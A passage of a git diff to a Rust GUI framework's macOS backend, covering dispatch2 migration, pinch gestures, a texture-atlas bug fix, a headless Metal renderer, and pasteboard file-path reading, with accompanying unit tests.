metadata.is_closed() { - return; - } - - let location = metadata.location; + let location = runnable.metadata().location; let start = Instant::now(); - let timing = TaskTiming { + let mut timing = TaskTiming { location, start, end: None, }; - THREAD_TIMINGS.with(|timings| { - let mut timings = timings.lock(); - let timings = &mut timings.timings; - if let Some(last_timing) = timings.iter_mut().rev().next() { - if last_timing.location == timing.location { - return; - } - } - - timings.push_back(timing); - }); + add_task_timing(timing); runnable.run(); - let end = Instant::now(); - THREAD_TIMINGS.with(|timings| { - let mut timings = timings.lock(); - let timings = &mut timings.timings; - let Some(last_timing) = timings.iter_mut().rev().next() else { - return; - }; - last_timing.end = Some(end); - }); + timing.end = Some(Instant::now()); + add_task_timing(timing); } diff --git a/crates/gpui_macos/src/display_link.rs b/crates/gpui_macos/src/display_link.rs index b086cc1b12182db661e5fa1cb82b671c7fd5b8bc..86e9b4072bab3cfb7cf5d0d69bc6ca29ad15cbb1 100644 --- a/crates/gpui_macos/src/display_link.rs +++ b/crates/gpui_macos/src/display_link.rs @@ -1,26 +1,21 @@ -use crate::{ - dispatch_get_main_queue, - dispatcher::dispatch_sys::{ - _dispatch_source_type_data_add, dispatch_resume, dispatch_set_context, - dispatch_source_cancel, dispatch_source_create, dispatch_source_merge_data, - dispatch_source_set_event_handler_f, dispatch_source_t, dispatch_suspend, - }, -}; use anyhow::Result; use core_graphics::display::CGDirectDisplayID; +use dispatch2::{ + _dispatch_source_type_data_add, DispatchObject, DispatchQueue, DispatchRetained, DispatchSource, +}; use std::ffi::c_void; use util::ResultExt; pub struct DisplayLink { display_link: Option, - frame_requests: dispatch_source_t, + frame_requests: DispatchRetained, } impl DisplayLink { pub fn new( display_id: CGDirectDisplayID, data: *mut c_void, - callback: unsafe extern "C" fn(*mut c_void), + callback: extern "C" fn(*mut c_void), ) -> Result { unsafe extern "C" fn display_link_callback( _display_link_out: *mut sys::CVDisplayLink, @@ -31,31 +26,27 @@ impl DisplayLink { frame_requests: *mut c_void, ) -> i32 { unsafe { - let frame_requests = frame_requests as dispatch_source_t; - dispatch_source_merge_data(frame_requests, 1); + let frame_requests = &*(frame_requests as *const DispatchSource); + frame_requests.merge_data(1); 0 } } unsafe { - let frame_requests = dispatch_source_create( - &_dispatch_source_type_data_add, + let frame_requests = DispatchSource::new( + &raw const _dispatch_source_type_data_add as *mut _, 0, 0, - dispatch_get_main_queue(), - ); - dispatch_set_context( - crate::dispatch_sys::dispatch_object_t { - _ds: frame_requests, - }, - data, + Some(DispatchQueue::main()), ); - dispatch_source_set_event_handler_f(frame_requests, Some(callback)); + frame_requests.set_context(data); + frame_requests.set_event_handler_f(callback); + frame_requests.resume(); let display_link = sys::DisplayLink::new( display_id, display_link_callback, - frame_requests as *mut c_void, + &*frame_requests as *const DispatchSource as *mut c_void, )?; Ok(Self { @@ -67,9 +58,6 @@ impl DisplayLink { pub fn start(&mut self) -> Result<()> { unsafe { - dispatch_resume(crate::dispatch_sys::dispatch_object_t { - _ds: self.frame_requests, - }); self.display_link.as_mut().unwrap().start()?; } Ok(()) @@ -77,9 +65,6 @@ impl DisplayLink { pub fn stop(&mut self) -> Result<()> { unsafe { - dispatch_suspend(crate::dispatch_sys::dispatch_object_t { - _ds: self.frame_requests, - }); self.display_link.as_mut().unwrap().stop()?; } Ok(()) @@ -97,9 +82,7 @@ impl Drop for DisplayLink { // // We might also want to upgrade to CADisplayLink, but that requires dropping old macOS support. std::mem::forget(self.display_link.take()); - unsafe { - dispatch_source_cancel(self.frame_requests); - } + self.frame_requests.cancel(); } } diff --git a/crates/gpui_macos/src/events.rs b/crates/gpui_macos/src/events.rs index 5970488a17fbf9395f4ba29f5b98a135f6d55f7f..71bcb105e8aa8c6c43fd5b7864881535454c5ec3 100644 --- a/crates/gpui_macos/src/events.rs +++ b/crates/gpui_macos/src/events.rs @@ -1,8 +1,8 @@ use gpui::{ Capslock, KeyDownEvent, KeyUpEvent, Keystroke, Modifiers, ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseExitEvent, MouseMoveEvent, MousePressureEvent, MouseUpEvent, - NavigationDirection, Pixels, PlatformInput, PressureStage, ScrollDelta, ScrollWheelEvent, - TouchPhase, point, px, + NavigationDirection, PinchEvent, Pixels, PlatformInput, PressureStage, ScrollDelta, + ScrollWheelEvent, TouchPhase, point, px, }; use crate::{ @@ -234,6 +234,27 @@ pub(crate) unsafe fn platform_input_from_native( _ => None, } } + NSEventType::NSEventTypeMagnify => window_height.map(|window_height| { + let phase = match native_event.phase() { + NSEventPhase::NSEventPhaseMayBegin | NSEventPhase::NSEventPhaseBegan => { + TouchPhase::Started + } + NSEventPhase::NSEventPhaseEnded => TouchPhase::Ended, + _ => TouchPhase::Moved, + }; + + let magnification = native_event.magnification() as f32; + + PlatformInput::Pinch(PinchEvent { + position: point( + px(native_event.locationInWindow().x as f32), + window_height - px(native_event.locationInWindow().y as f32), + ), + delta: magnification, + modifiers: read_modifiers(native_event), + phase, + }) + }), NSEventType::NSScrollWheel => window_height.map(|window_height| { let phase = match native_event.phase() { NSEventPhase::NSEventPhaseMayBegin | NSEventPhase::NSEventPhaseBegan => { diff --git a/crates/gpui_macos/src/metal_atlas.rs b/crates/gpui_macos/src/metal_atlas.rs index eacd9407fe2e447abbd05dc8cdb2e9f7660cf3cf..e6b8443c520e1b47006104085fdc26a5415d85f6 100644 --- a/crates/gpui_macos/src/metal_atlas.rs +++ b/crates/gpui_macos/src/metal_atlas.rs @@ -61,7 +61,7 @@ impl PlatformAtlas for MetalAtlas { fn remove(&self, key: &AtlasKey) { let mut lock = self.0.lock(); - let Some(id) = lock.tiles_by_key.get(key).map(|v| v.texture_id) else { + let Some(id) = lock.tiles_by_key.remove(key).map(|v| v.texture_id) else { return; }; @@ -81,10 +81,8 @@ impl PlatformAtlas for MetalAtlas { if let Some(mut texture) = texture_slot.take() { texture.decrement_ref_count(); - if texture.is_unreferenced() { textures.free_list.push(id.index as usize); - lock.tiles_by_key.remove(key); } else { *texture_slot = Some(texture); } @@ -271,3 +269,81 @@ fn point_from_etagere(value: etagere::Point) -> Point { struct AssertSend(T); unsafe impl Send for AssertSend {} + +#[cfg(test)] +mod tests { + use super::*; + use gpui::PlatformAtlas; + use std::borrow::Cow; + + fn create_atlas() -> Option { + let device = metal::Device::system_default()?; + Some(MetalAtlas::new(device, true)) + } + + fn make_image_key(image_id: usize, frame_index: usize) -> AtlasKey { + AtlasKey::Image(gpui::RenderImageParams { + image_id: gpui::ImageId(image_id), + frame_index, + }) + } + + fn insert_tile(atlas: &MetalAtlas, key: &AtlasKey, size: Size) -> AtlasTile { + atlas + .get_or_insert_with(key, &mut || { + let byte_count = (size.width.0 as usize) * (size.height.0 as usize) * 4; + Ok(Some((size, Cow::Owned(vec![0u8; byte_count])))) + }) + .expect("allocation should succeed") + .expect("callback returns Some") + } + + #[test] + fn test_remove_clears_stale_keys_from_tiles_by_key() { + let Some(atlas) = create_atlas() else { + return; + }; + + let small = Size { + width: DevicePixels(64), + height: DevicePixels(64), + }; + + let key_a = make_image_key(1, 0); + let key_b = make_image_key(2, 0); + let key_c = make_image_key(3, 0); + + let tile_a = insert_tile(&atlas, &key_a, small); + let tile_b = insert_tile(&atlas, &key_b, small); + let tile_c = insert_tile(&atlas, &key_c, small); + + assert_eq!(tile_a.texture_id, tile_b.texture_id); + assert_eq!(tile_b.texture_id, tile_c.texture_id); + + // Remove A: texture still has B and C, so it stays. + // The key for A must be removed from tiles_by_key. + atlas.remove(&key_a); + + // Remove B: texture still has C. + atlas.remove(&key_b); + + // Remove C: texture becomes unreferenced and is deleted. + atlas.remove(&key_c); + + // Re-inserting A must allocate a fresh tile on a new texture, + // NOT return a stale tile referencing the deleted texture. + let tile_a2 = insert_tile(&atlas, &key_a, small); + + // The texture must actually exist — this would panic before the fix. + let _texture = atlas.metal_texture(tile_a2.texture_id); + } + + #[test] + fn test_remove_nonexistent_key_is_noop() { + let Some(atlas) = create_atlas() else { + return; + }; + let key = make_image_key(999, 0); + atlas.remove(&key); + } +} diff --git a/crates/gpui_macos/src/metal_renderer.rs b/crates/gpui_macos/src/metal_renderer.rs index 93e039019b1ca639118b5453ff8f9de0d30e4f99..e96d14b15691bec1da54aa9d46e3e765218292b2 100644 --- a/crates/gpui_macos/src/metal_renderer.rs +++ b/crates/gpui_macos/src/metal_renderer.rs @@ -110,10 +110,12 @@ impl InstanceBufferPool { pub(crate) struct MetalRenderer { device: metal::Device, - layer: metal::MetalLayer, + layer: Option, is_apple_gpu: bool, is_unified_memory: bool, presents_with_transaction: bool, + /// For headless rendering, tracks whether output should be opaque + opaque: bool, command_queue: CommandQueue, paths_rasterization_pipeline_state: metal::RenderPipelineState, path_sprites_pipeline_state: metal::RenderPipelineState, @@ -142,26 +144,9 @@ pub struct PathRasterizationVertex { } impl MetalRenderer { + /// Creates a new MetalRenderer with a CAMetalLayer for window-based rendering. pub fn new(instance_buffer_pool: Arc>, transparent: bool) -> Self { - // Prefer low‐power integrated GPUs on Intel Mac. On Apple - // Silicon, there is only ever one GPU, so this is equivalent to - // `metal::Device::system_default()`. - let device = if let Some(d) = metal::Device::all() - .into_iter() - .min_by_key(|d| (d.is_removable(), !d.is_low_power())) - { - d - } else { - // For some reason `all()` can return an empty list, see https://github.com/zed-industries/zed/issues/37689 - // In that case, we fall back to the system default device. - log::error!( - "Unable to enumerate Metal devices; attempting to use system default device" - ); - metal::Device::system_default().unwrap_or_else(|| { - log::error!("unable to access a compatible graphics device"); - std::process::exit(1); - }) - }; + let device = Self::create_device(); let layer = metal::MetalLayer::new(); layer.set_device(&device); @@ -182,6 +167,48 @@ impl MetalRenderer { | AutoresizingMask::HEIGHT_SIZABLE ]; } + + Self::new_internal(device, Some(layer), !transparent, instance_buffer_pool) + } + + /// Creates a new headless MetalRenderer for offscreen rendering without a window. + /// + /// This renderer can render scenes to images without requiring a CAMetalLayer, + /// window, or AppKit. Use `render_scene_to_image()` to render scenes. + #[cfg(any(test, feature = "test-support"))] + pub fn new_headless(instance_buffer_pool: Arc>) -> Self { + let device = Self::create_device(); + Self::new_internal(device, None, true, instance_buffer_pool) + } + + fn create_device() -> metal::Device { + // Prefer low‐power integrated GPUs on Intel Mac. On Apple + // Silicon, there is only ever one GPU, so this is equivalent to + // `metal::Device::system_default()`. + if let Some(d) = metal::Device::all() + .into_iter() + .min_by_key(|d| (d.is_removable(), !d.is_low_power())) + { + d + } else { + // For some reason `all()` can return an empty list, see https://github.com/zed-industries/zed/issues/37689 + // In that case, we fall back to the system default device. + log::error!( + "Unable to enumerate Metal devices; attempting to use system default device" + ); + metal::Device::system_default().unwrap_or_else(|| { + log::error!("unable to access a compatible graphics device"); + std::process::exit(1); + }) + } + } + + fn new_internal( + device: metal::Device, + layer: Option, + opaque: bool, + instance_buffer_pool: Arc>, + ) -> Self { #[cfg(feature = "runtime_shaders")] let library = device .new_library_with_source(&SHADERS_SOURCE_FILE, &metal::CompileOptions::new()) @@ -303,6 +330,7 @@ impl MetalRenderer { presents_with_transaction: false, is_apple_gpu, is_unified_memory, + opaque, command_queue, paths_rasterization_pipeline_state, path_sprites_pipeline_state, @@ -322,12 +350,15 @@ impl MetalRenderer { } } - pub fn layer(&self) -> &metal::MetalLayerRef { - &self.layer + pub fn layer(&self) -> Option<&metal::MetalLayerRef> { + self.layer.as_ref().map(|l| l.as_ref()) } pub fn layer_ptr(&self) -> *mut CAMetalLayer { - self.layer.as_ptr() + self.layer + .as_ref() + .map(|l| l.as_ptr()) + .unwrap_or(ptr::null_mut()) } pub fn sprite_atlas(&self) -> &Arc { @@ -336,26 +367,25 @@ impl MetalRenderer { pub fn set_presents_with_transaction(&mut self, presents_with_transaction: bool) { self.presents_with_transaction = presents_with_transaction; - self.layer - .set_presents_with_transaction(presents_with_transaction); + if let Some(layer) = &self.layer { + layer.set_presents_with_transaction(presents_with_transaction); + } } pub fn update_drawable_size(&mut self, size: Size) { - let size = NSSize { - width: size.width.0 as f64, - height: size.height.0 as f64, - }; - unsafe { - let _: () = msg_send![ - self.layer(), - setDrawableSize: size - ]; + if let Some(layer) = &self.layer { + let ns_size = NSSize { + width: size.width.0 as f64, + height: size.height.0 as f64, + }; + unsafe { + let _: () = msg_send![ + layer.as_ref(), + setDrawableSize: ns_size + ]; + } } - let device_pixels_size = Size { - width: DevicePixels(size.width as i32), - height: DevicePixels(size.height as i32), - }; - self.update_path_intermediate_textures(device_pixels_size); + self.update_path_intermediate_textures(size); } fn update_path_intermediate_textures(&mut self, size: Size) { @@ -396,8 +426,11 @@ impl MetalRenderer { } } - pub fn update_transparency(&self, transparent: bool) { - self.layer.set_opaque(!transparent); + pub fn update_transparency(&mut self, transparent: bool) { + self.opaque = !transparent; + if let Some(layer) = &self.layer { + layer.set_opaque(!transparent); + } } pub fn destroy(&self) { @@ -405,7 +438,15 @@ impl MetalRenderer { } pub fn draw(&mut self, scene: &Scene) { - let layer = self.layer.clone(); + let layer = match &self.layer { + Some(l) => l.clone(), + None => { + log::error!( + "draw() called on headless renderer - use render_scene_to_image() instead" + ); + return; + } + }; let viewport_size = layer.drawable_size(); let viewport_size: Size = size( (viewport_size.width.ceil() as i32).into(), @@ -476,9 +517,15 @@ impl MetalRenderer { /// Renders the scene to a texture and returns the pixel data as an RGBA image. /// This does not present the frame to screen - useful for visual testing /// where we want to capture what would be rendered without displaying it. + /// + /// Note: This requires a layer-backed renderer. For headless rendering, + /// use `render_scene_to_image()` instead. #[cfg(any(test, feature = "test-support"))] pub fn render_to_image(&mut self, scene: &Scene) -> Result { - let layer = self.layer.clone(); + let layer = self + .layer + .clone() + .ok_or_else(|| anyhow::anyhow!("render_to_image requires a layer-backed renderer"))?; let viewport_size = layer.drawable_size(); let viewport_size: Size = size( (viewport_size.width.ceil() as i32).into(), @@ -567,21 +614,146 @@ impl MetalRenderer { } } + /// Renders a scene to an image without requiring a window or CAMetalLayer. + /// + /// This is the primary method for headless rendering. It creates an offscreen + /// texture, renders the scene to it, and returns the pixel data as an RGBA image. + #[cfg(any(test, feature = "test-support"))] + pub fn render_scene_to_image( + &mut self, + scene: &Scene, + size: Size, + ) -> Result { + if size.width.0 <= 0 || size.height.0 <= 0 { + anyhow::bail!("Invalid size for render_scene_to_image: {:?}", size); + } + + // Update path intermediate textures for this size + self.update_path_intermediate_textures(size); + + // Create an offscreen texture as render target + let texture_descriptor = metal::TextureDescriptor::new(); + texture_descriptor.set_width(size.width.0 as u64); + texture_descriptor.set_height(size.height.0 as u64); + texture_descriptor.set_pixel_format(MTLPixelFormat::BGRA8Unorm); + texture_descriptor + .set_usage(metal::MTLTextureUsage::RenderTarget | metal::MTLTextureUsage::ShaderRead); + texture_descriptor.set_storage_mode(metal::MTLStorageMode::Managed); + let target_texture = self.device.new_texture(&texture_descriptor); + + loop { + let mut instance_buffer = self + .instance_buffer_pool + .lock() + .acquire(&self.device, self.is_unified_memory); + + let command_buffer = + self.draw_primitives_to_texture(scene, &mut instance_buffer, &target_texture, size); + + match command_buffer { + Ok(command_buffer) => { + let instance_buffer_pool = self.instance_buffer_pool.clone(); + let instance_buffer = Cell::new(Some(instance_buffer)); + let block = ConcreteBlock::new(move |_| { + if let Some(instance_buffer) = instance_buffer.take() { + instance_buffer_pool.lock().release(instance_buffer); + } + }); + let block = block.copy(); + command_buffer.add_completed_handler(&block); + + // On discrete GPUs (non-unified memory), Managed textures + // require an explicit blit synchronize before the CPU can + // read back the rendered data. Without this, get_bytes + // returns stale zeros. + if !self.is_unified_memory { + let blit = command_buffer.new_blit_command_encoder(); + blit.synchronize_resource(&target_texture); + blit.end_encoding(); + } + + // Commit and wait for completion + command_buffer.commit(); + command_buffer.wait_until_completed(); + + // Read pixels from the texture + let width = size.width.0 as u32; + let height = size.height.0 as u32; + let bytes_per_row = width as usize * 4; + let buffer_size = height as usize * bytes_per_row; + + let mut pixels = vec![0u8; buffer_size]; + + let region = metal::MTLRegion { + origin: metal::MTLOrigin { x: 0, y: 0, z: 0 }, + size: metal::MTLSize { + width: width as u64, + height: height as u64, + depth: 1, + }, + }; + + target_texture.get_bytes( + pixels.as_mut_ptr() as *mut std::ffi::c_void, + bytes_per_row as u64, + region, + 0, + ); + + // Convert BGRA to RGBA (swap B and R channels) + for chunk in pixels.chunks_exact_mut(4) { + chunk.swap(0, 2); + } + + return RgbaImage::from_raw(width, height, pixels).ok_or_else(|| { + anyhow::anyhow!("Failed to create RgbaImage from pixel data") + }); + } + Err(err) => { + log::error!( + "failed to render: {}. retrying with larger instance buffer size", + err + ); + let mut instance_buffer_pool = self.instance_buffer_pool.lock(); + let buffer_size = instance_buffer_pool.buffer_size; + if buffer_size >= 256 * 1024 * 1024 { + anyhow::bail!("instance buffer size grew too large: {}", buffer_size); + } + instance_buffer_pool.reset(buffer_size * 2); + log::info!( + "increased instance buffer size to {}", + instance_buffer_pool.buffer_size + ); + } + } + } + } + fn draw_primitives( &mut self, scene: &Scene, instance_buffer: &mut InstanceBuffer, drawable: &metal::MetalDrawableRef, viewport_size: Size, + ) -> Result { + self.draw_primitives_to_texture(scene, instance_buffer, drawable.texture(), viewport_size) + } + + fn draw_primitives_to_texture( + &mut self, + scene: &Scene, + instance_buffer: &mut InstanceBuffer, + texture: &metal::TextureRef, + viewport_size: Size, ) -> Result { let command_queue = self.command_queue.clone(); let command_buffer = command_queue.new_command_buffer(); - let alpha = if self.layer.is_opaque() { 1. } else { 0. }; + let alpha = if self.opaque { 1. } else { 0. }; let mut instance_offset = 0; - let mut command_encoder = new_command_encoder( + let mut command_encoder = new_command_encoder_for_texture( command_buffer, - drawable, + texture, viewport_size, |color_attachment| { color_attachment.set_load_action(metal::MTLLoadAction::Clear); @@ -617,9 +789,9 @@ impl MetalRenderer { command_buffer, ); - command_encoder = new_command_encoder( + command_encoder = new_command_encoder_for_texture( command_buffer, - drawable, + texture, viewport_size, |color_attachment| { color_attachment.set_load_action(metal::MTLLoadAction::Load); @@ -1309,9 +1481,9 @@ impl MetalRenderer { } } -fn new_command_encoder<'a>( +fn new_command_encoder_for_texture<'a>( command_buffer: &'a metal::CommandBufferRef, - drawable: &'a metal::MetalDrawableRef, + texture: &'a metal::TextureRef, viewport_size: Size, configure_color_attachment: impl Fn(&RenderPassColorAttachmentDescriptorRef), ) -> &'a metal::RenderCommandEncoderRef { @@ -1320,7 +1492,7 @@ fn new_command_encoder<'a>( .color_attachments() .object_at(0) .unwrap(); - color_attachment.set_texture(Some(drawable.texture())); + color_attachment.set_texture(Some(texture)); color_attachment.set_store_action(metal::MTLStoreAction::Store); configure_color_attachment(color_attachment); @@ -1506,3 +1678,32 @@ pub struct SurfaceBounds { pub bounds: Bounds, pub content_mask: ContentMask, } + +#[cfg(any(test, feature = "test-support"))] +pub struct MetalHeadlessRenderer { + renderer: MetalRenderer, +} + +#[cfg(any(test, feature = "test-support"))] +impl MetalHeadlessRenderer { + pub fn new() -> Self { + let instance_buffer_pool = Arc::new(Mutex::new(InstanceBufferPool::default())); + let renderer = MetalRenderer::new_headless(instance_buffer_pool); + Self { renderer } + } +} + +#[cfg(any(test, feature = "test-support"))] +impl gpui::PlatformHeadlessRenderer for MetalHeadlessRenderer { + fn render_scene_to_image( + &mut self, + scene: &Scene, + size: Size, + ) -> anyhow::Result { + self.renderer.render_scene_to_image(scene, size) + } + + fn sprite_atlas(&self) -> Arc { + self.renderer.sprite_atlas().clone() + } +} diff --git a/crates/gpui_macos/src/pasteboard.rs b/crates/gpui_macos/src/pasteboard.rs index aceb635194402cdb203aed0f27aae78fa42be32d..d8b7f5627ddc44bea867132c91216b00729488d9 100644 --- a/crates/gpui_macos/src/pasteboard.rs +++ b/crates/gpui_macos/src/pasteboard.rs @@ -1,16 +1,23 @@ use core::slice; -use std::ffi::c_void; +use std::ffi::{CStr, c_void}; +use std::path::PathBuf; use cocoa::{ - appkit::{NSPasteboard, NSPasteboardTypePNG, NSPasteboardTypeString, NSPasteboardTypeTIFF}, + appkit::{ + NSFilenamesPboardType, NSPasteboard, NSPasteboardTypePNG, NSPasteboardTypeString, + NSPasteboardTypeTIFF, + }, base::{id, nil}, - foundation::NSData, + foundation::{NSArray, NSData, NSFastEnumeration, NSString}, }; use objc::{msg_send, runtime::Object, sel, sel_impl}; +use smallvec::SmallVec; use strum::IntoEnumIterator as _; use crate::ns_string; -use gpui::{ClipboardEntry, ClipboardItem, ClipboardString, Image, ImageFormat, hash}; +use gpui::{ + ClipboardEntry, ClipboardItem, ClipboardString, ExternalPaths, Image, ImageFormat, hash, +}; pub struct Pasteboard { inner: id, @@ -41,28 +48,37 @@ impl Pasteboard { } pub fn read(&self) -> Option { - // First, see if it's a string. unsafe { - let pasteboard_types: id = self.inner.types(); - let string_type: id = ns_string("public.utf8-plain-text"); + // Check for file paths first + let filenames = NSPasteboard::propertyListForType(self.inner, NSFilenamesPboardType); + if filenames != nil && NSArray::count(filenames) > 0 { + let mut paths = SmallVec::new(); + for file in filenames.iter() { + let f = NSString::UTF8String(file); + let path = CStr::from_ptr(f).to_string_lossy().into_owned(); + paths.push(PathBuf::from(path)); + } + if !paths.is_empty() { + let mut entries = vec![ClipboardEntry::ExternalPaths(ExternalPaths(paths))]; + + // Also include the string representation so text editors can + // paste the path as text. + if let Some(string_item) = self.read_string_from_pasteboard() { + entries.push(string_item); + } - if msg_send![pasteboard_types, containsObject: string_type] { - let data = self.inner.dataForType(string_type); - if data == nil { - return None; - } else if data.bytes().is_null() { - // https://developer.apple.com/documentation/foundation/nsdata/1410616-bytes?language=objc - // "If the length of the NSData object is 0, this property returns nil." - return Some(self.read_string(&[])); - } else { - let bytes = - slice::from_raw_parts(data.bytes() as *mut u8, data.length() as usize); - - return Some(self.read_string(bytes)); + return Some(ClipboardItem { entries }); } } - // If it wasn't a string, try the various supported image types. + // Next, check for a plain string. + if let Some(string_entry) = self.read_string_from_pasteboard() { + return Some(ClipboardItem { + entries: vec![string_entry], + }); + } + + // Finally, try the various supported image types. for format in ImageFormat::iter() { if let Some(item) = self.read_image(format) { return Some(item); @@ -70,7 +86,6 @@ impl Pasteboard { } } - // If it wasn't a string or a supported image type, give up. None } @@ -94,8 +109,26 @@ impl Pasteboard { } } - fn read_string(&self, text_bytes: &[u8]) -> ClipboardItem { + unsafe fn read_string_from_pasteboard(&self) -> Option { unsafe { + let pasteboard_types: id = self.inner.types(); + let string_type: id = ns_string("public.utf8-plain-text"); + + if !msg_send![pasteboard_types, containsObject: string_type] { + return None; + } + + let data = self.inner.dataForType(string_type); + let text_bytes: &[u8] = if data == nil { + return None; + } else if data.bytes().is_null() { + // https://developer.apple.com/documentation/foundation/nsdata/1410616-bytes?language=objc + // "If the length of the NSData object is 0, this property returns nil." + &[] + } else { + slice::from_raw_parts(data.bytes() as *mut u8, data.length() as usize) + }; + let text = String::from_utf8_lossy(text_bytes).to_string(); let metadata = self .data_for_type(self.text_hash_type) @@ -111,9 +144,7 @@ impl Pasteboard { } }); - ClipboardItem { - entries: vec![ClipboardEntry::String(ClipboardString { text, metadata })], - } + Some(ClipboardEntry::String(ClipboardString { text, metadata })) } } @@ -300,12 +331,44 @@ impl UTType { #[cfg(test)] mod tests { - use cocoa::{appkit::NSPasteboardTypeString, foundation::NSData}; + use cocoa::{ + appkit::{NSFilenamesPboardType, NSPasteboard, NSPasteboardTypeString}, + base::{id, nil}, + foundation::{NSArray, NSData}, + }; + use std::ffi::c_void; - use gpui::{ClipboardEntry, ClipboardItem, ClipboardString}; + use gpui::{ClipboardEntry, ClipboardItem, ClipboardString, ImageFormat}; use super::*; + unsafe fn simulate_external_file_copy(pasteboard: &Pasteboard, paths: &[&str]) { + unsafe { + let ns_paths: Vec = paths.iter().map(|p| ns_string(p)).collect(); + let ns_array = NSArray::arrayWithObjects(nil, &ns_paths); + + let mut types = vec![NSFilenamesPboardType]; + types.push(NSPasteboardTypeString); + + let types_array = NSArray::arrayWithObjects(nil, &types); + pasteboard.inner.declareTypes_owner(types_array, nil); + + pasteboard + .inner + .setPropertyList_forType(ns_array, NSFilenamesPboardType); + + let joined = paths.join("\n"); + let bytes = NSData::dataWithBytes_length_( + nil, + joined.as_ptr() as *const c_void, + joined.len() as u64, + ); + pasteboard + .inner + .setData_forType(bytes, NSPasteboardTypeString); + } + } + #[test] fn test_string() { let pasteboard = Pasteboard::unique(); @@ -339,4 +402,124 @@ mod tests { Some(ClipboardItem::new_string(text_from_other_app.to_string())) ); } + + #[test] + fn test_read_external_path() { + let pasteboard = Pasteboard::unique(); + + unsafe { + simulate_external_file_copy(&pasteboard, &["/test.txt"]); + } + + let item = pasteboard.read().expect("should read clipboard item"); + + // Test both ExternalPaths and String entries exist + assert_eq!(item.entries.len(), 2); + + // Test first entry is ExternalPaths + match &item.entries[0] { + ClipboardEntry::ExternalPaths(ep) => { + assert_eq!(ep.paths(), &[PathBuf::from("/test.txt")]); + } + other => panic!("expected ExternalPaths, got {:?}", other), + } + + // Test second entry is String + match &item.entries[1] { + ClipboardEntry::String(s) => { + assert_eq!(s.text(), "/test.txt"); + } + other => panic!("expected String, got {:?}", other), + } + } + + #[test] + fn test_read_external_paths_with_spaces() { + let pasteboard = Pasteboard::unique(); + let paths = ["/some file with spaces.txt"]; + + unsafe { + simulate_external_file_copy(&pasteboard, &paths); + } + + let item = pasteboard.read().expect("should read clipboard item"); + + match &item.entries[0] { + ClipboardEntry::ExternalPaths(ep) => { + assert_eq!(ep.paths(), &[PathBuf::from("/some file with spaces.txt")]); + } + other => panic!("expected ExternalPaths, got {:?}", other), + } + } + + #[test] + fn test_read_multiple_external_paths() { + let pasteboard = Pasteboard::unique(); + let paths = ["/file.txt", "/image.png"]; + + unsafe { + simulate_external_file_copy(&pasteboard, &paths); + } + + let item = pasteboard.read().expect("should read clipboard item"); + assert_eq!(item.entries.len(), 2); + + // Test both ExternalPaths and String entries exist + match &item.entries[0] { + ClipboardEntry::ExternalPaths(ep) => { + assert_eq!( + ep.paths(), + &[PathBuf::from("/file.txt"), PathBuf::from("/image.png"),] + ); + } + other => panic!("expected ExternalPaths, got {:?}", other), + } + + match &item.entries[1] { + ClipboardEntry::String(s) => { + assert_eq!(s.text(), "/file.txt\n/image.png"); + assert_eq!(s.metadata, None); + } + other => panic!("expected String, got {:?}", other), + } + } + + #[test] + fn test_read_image() { + let pasteboard = Pasteboard::unique(); + + // Smallest valid PNG: 1x1 transparent pixel + let png_bytes: &[u8] = &[ + 0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A, 0x00, 0x00, 0x00, 0x0D, 0x49, 0x48, + 0x44, 0x52, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x08, 0x06, 0x00, 0x00, + 0x00, 0x1F, 0x15, 0xC4, 0x89, 0x00, 0x00, 0x00, 0x0A, 0x49, 0x44, 0x41, 0x54, 0x78, + 0x9C, 0x62, 0x00, 0x00, 0x00, 0x02, 0x00, 0x01, 0xE5, 0x27, 0xDE, 0xFC, 0x00, 0x00, + 0x00, 0x00, 0x49, 0x45, 0x4E, 0x44, 0xAE, 0x42, 0x60, 0x82, + ]; + + unsafe { + let ns_png_type = NSPasteboardTypePNG; + let types_array = NSArray::arrayWithObjects(nil, &[ns_png_type]); + pasteboard.inner.declareTypes_owner(types_array, nil); + + let data = NSData::dataWithBytes_length_( + nil, + png_bytes.as_ptr() as *const c_void, + png_bytes.len() as u64, + ); + pasteboard.inner.setData_forType(data, ns_png_type); + } + + let item = pasteboard.read().expect("should read PNG image"); + + // Test Image entry exists + assert_eq!(item.entries.len(), 1); + match &item.entries[0] { + ClipboardEntry::Image(img) => { + assert_eq!(img.format, ImageFormat::Png); + assert_eq!(img.bytes, png_bytes); + } + other => panic!("expected Image, got {:?}", other), + } + } } diff --git a/crates/gpui_macos/src/platform.rs b/crates/gpui_macos/src/platform.rs index c982f6da191f6b657e51238d8b6ac3d11f724149..5bae3cfb6aa73c99038e0017332a046035dc1589 100644 --- a/crates/gpui_macos/src/platform.rs +++ b/crates/gpui_macos/src/platform.rs @@ -7,8 +7,8 @@ use block::ConcreteBlock; use cocoa::{ appkit::{ NSApplication, NSApplicationActivationPolicy::NSApplicationActivationPolicyRegular, - NSEventModifierFlags, NSMenu, NSMenuItem, NSModalResponse, NSOpenPanel, NSSavePanel, - NSVisualEffectState, NSVisualEffectView, NSWindow, + NSControl as _, NSEventModifierFlags, NSMenu, NSMenuItem, NSModalResponse, NSOpenPanel, + NSSavePanel, NSVisualEffectState, NSVisualEffectView, NSWindow, }, base::{BOOL, NO, YES, id, nil, selector}, foundation::{ @@ -24,6 +24,7 @@ use core_foundation::{ string::{CFString, CFStringRef}, }; use ctor::ctor; +use dispatch2::DispatchQueue; use futures::channel::oneshot; use gpui::{ Action, AnyWindowHandle, BackgroundExecutor, ClipboardItem, CursorStyle, ForegroundExecutor, @@ -296,6 +297,7 @@ impl MacPlatform { action, os_action, checked, + disabled, } => { // Note that this is intentionally using earlier bindings, whereas typically // later ones take display precedence. See the discussion on @@ -393,13 +395,18 @@ impl MacPlatform { if *checked { item.setState_(NSVisualEffectState::Active); } + item.setEnabled_(if *disabled { NO } else { YES }); let tag = actions.len() as NSInteger; let _: () = msg_send![item, setTag: tag]; actions.push(action.boxed_clone()); item } - MenuItem::Submenu(Menu { name, items }) => { + MenuItem::Submenu(Menu { + name, + items, + disabled, + }) => { let item = NSMenuItem::new(nil).autorelease(); let submenu = NSMenu::new(nil).autorelease(); submenu.setDelegate_(delegate); @@ -407,6 +414,7 @@ impl MacPlatform { submenu.addItem_(Self::create_menu_item(item, delegate, actions, keymap)); } item.setSubmenu_(submenu); + item.setEnabled_(if *disabled { NO } else { YES }); item.setTitle_(ns_string(name)); item } @@ -493,13 +501,11 @@ impl Platform for MacPlatform { // this, we make 